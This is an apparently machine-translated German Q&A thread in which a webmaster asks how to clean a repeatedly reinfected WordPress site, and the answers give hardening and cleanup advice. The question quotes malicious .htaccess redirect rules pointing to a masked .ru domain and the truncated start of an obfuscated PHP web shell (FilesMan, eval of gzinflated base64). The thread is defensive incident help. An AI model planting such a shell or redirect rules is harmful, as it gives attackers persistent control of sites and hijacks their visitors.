Bereinigen Sie eine angegriffene Website

7

Seit wenigen Monaten wird eine Client-Website von Bots angegriffen. Ich habe die Website-Quelle geändert (jetzt WordPress letzte Version), versuche zu reinigen, aber Bot finden Loch in Sicherheit ...

Nach der Bot-Aktion kann ich .htaccess-Dateien auf der Website finden.

ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]

Ich kann in meinen Protokolldateien die verwendete Datei zum Hinzufügen von .htaccess finden:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"

Mit diesem Code im Inneren:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]

Ich lösche .php-Dateien, .htaccess-Dateien, aber sie erscheinen nach Stunden oder Minuten ... Wie wird vorgegangen, um das Loch zu finden / den Bot-Angriff zu stoppen?

(Es ist auf Shared Hosting (ovh.com)

bux
quelle

Antworten:

9

Grundlegende Sicherheitsschritte

Da Wordpress so beliebt ist, gibt es eine Menge Drive-by-Hacks, die herumklopfen und die Mängel in der grundlegenden Sicherheit ausnutzen. Alle Wordpress-Benutzer sollten die folgenden grundlegenden und einfachen Schritte unternehmen, um sich selbst zu schützen:

  • Verwenden Sie wp_ nicht als Präfix für die Datenbanktabelle, sondern verwenden Sie eine beliebige Zeichenfolge zufälliger Zeichen, die anspricht.
  • Deaktivieren Sie Wordpress DB-Fehler.
  • Stellen Sie sicher, dass Ihr Verzeichnis auf chmod 755 und die Dateien 644 eingestellt ist.
  • Verwenden Sie einen sicheren Passwortgenerator (verwenden Sie mindestens 15 Zeichen).
  • Verwenden Sie admin nicht als Benutzernamen.
  • Legen Sie eine leere .htaccess-Datei im Verzeichnis wp-admin ab.
  • Lesen Sie Wordpress Hardening
  • Überprüfen Sie den Google-Cache Ihrer Website auf versteckte Malware.
  • Entfernen Sie sie <meta name="generator" content="WordPress X.X.X" />aus dem Header Ihrer Site, indem Sie sie remove_action('wp_head', 'wp_generator');in die Datei functions.php einfügen (Laufwerk von Angreifern kann nicht einfach gefunden werden, auf welche Version sie abzielen).

TimThumb Hack

Es gibt auch ein sehr beliebtes Hack-Laufwerk, das mit einer alten Version des beliebten Tim-Thumb-Skripts verbunden ist und Webmastern viele Probleme bereitet. Überprüfen Sie Ihr Upload-Verzeichnis auf PHP-Dateien und stellen Sie sicher, dass Sie auf die neueste Version des Skripts aktualisiert haben, um dies zu vermeiden.

Rat

Ich verwende ungefähr 10 verschiedene Wordpresses und habe festgestellt, dass das WP-Security-Plugin und das Konto von Website Defender von unschätzbarem Wert sind. Es scannt Ihre Website regelmäßig und meldet Sicherheitsfehler, Malware und sogar Seitenfehler per E-Mail, sodass Sie sicher sein können, dass Sie wissen, wann etwas passiert geht schief.

WP-Firewall ist auch sehr nützlich zur Abwehr von 0-Tage-Exploits und VirusTotal ist praktisch, wenn Sie eine Infektion vermuten.

Akismet und Disqus.com sind nützliche Tools zur Abwehr von Kommentar-Spam. Lesen Sie dazu das Community-Wiki für Webmaster-Profis zu diesem Thema .

Webmaster werkzeuge

Sie sollten sich auch bei den Webmaster-Tools anmelden. Wenn Sie jedoch eine Infektion vermuten, führen Sie alle Schritte aus, um sie zuerst zu finden und zu bereinigen. Andernfalls warnt Google Ihre Nutzer, dass es sich bei Ihrer um eine gemeldete Angriffsseite handelt.

Wenn eine Infektion festgestellt wird, sendet Google eine E-Mail an alle folgenden Adressen. abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@Stellen Sie daher sicher, dass mindestens eine dieser Adressen vorhanden ist und überwacht wird.

Bezahlte Entfernungsdienste / Wo Sie Hilfe erhalten

Es gibt auch eine Reihe von Websites, die kostenpflichtige Malware-Entfernungsdienste anbieten. Ich wäre diesen sehr misstrauisch - viele scheinen Betrug der einen oder anderen Art zu sein.

In den WordPress-Foren , hier auf den Webmaster-Profis, auf der WordPress-Stackexchange-Site und im Stackoverflow , finden Sie kostenlos zahlreiche hochwertige Hilfe und Unterstützung . Zahlen Sie nicht für Dinge, die Sie selbst reparieren können.

toomanyairmiles
quelle
@bux kein Problem, überprüfen Sie Ihr Upload-Verzeichnis auf ausführbare Dateien, das ist der häufigste Angriffsvektor.
Toomanyairmiles
Können Sie näher erläutern, was die leere htaccess-Datei in wp-admin bewirkt?
Joshuahedlund
@joshuahedlund wurde entwickelt, um einen Angriff zu blockieren, bei dem versucht wurde, eine htaccess-Datei in das Verzeichnis wp-admin zu schreiben. Ich werde diesen Rat in Kürze mit einem neuen Code aktualisieren, um diesen Bereich der Site durch ein Passwort zu schützen und den Zugriff darauf vollständig zu blockieren.
Toomanyairmiles
8

Sie müssen jede Datei vollständig von Ihrer Website entfernen und eine Neuinstallation von Wordpress durchführen. Die Chancen stehen gut, dass sie Dateien hochgeladen haben, die ihnen den kontinuierlichen Zugriff auf Ihre Website ermöglichen. Wenn Sie nicht Datei für Datei gehen möchten, um herauszufinden, welche davon eine vollständige Installation von Grund auf sind, ist dies das Beste, was Sie tun können.

John Conde
quelle
Okey, keine Wunderlösung hehe ^^ Ich habe einen Fotoordner mit tausend Dateien. Es wird Spaß machen, diesen Teil zu überprüfen ^^
bux
Wenn Sie ein Backup haben, kann es auch hilfreich sein, einen Diff dagegen durchzuführen.
Tim Malone